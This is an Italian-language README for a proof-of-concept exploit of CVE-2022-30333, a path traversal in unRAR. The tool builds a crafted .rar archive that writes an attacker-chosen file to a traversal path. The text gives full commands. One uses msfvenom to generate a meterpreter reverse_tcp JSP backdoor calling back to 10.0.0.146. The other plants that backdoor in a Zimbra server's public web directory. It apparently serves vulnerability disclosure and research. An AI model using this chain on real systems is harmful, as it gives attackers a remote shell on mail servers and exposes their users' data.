
Una proof of concept per CVE-2022-30333 - una vulnerabilità di path traversal nelle versioni di unRAR precedenti alla 6.11. L'ho creata come dimostrazione dell'exploit per un articolo su AttackerKB, e spero di integrarla presto in un modulo Metasploit!
Fondamentalmente, fornisci un target (incluso il path traversal) e alcuni dati di file, e questo strumento genererà un .rar che estrarrà quel file in quella posizione. La lunghezza massima del file è di 104 byte, e la lunghezza massima del file è di 4096 byte. (Non è una caratteristica intrinseca della vulnerabilità, è solo quello che ho scelto quando ho generato il file).
Ad esempio, genera una backdoor con msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Poi crea un file .rar, posizionando il .jsp in un posto interessante:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar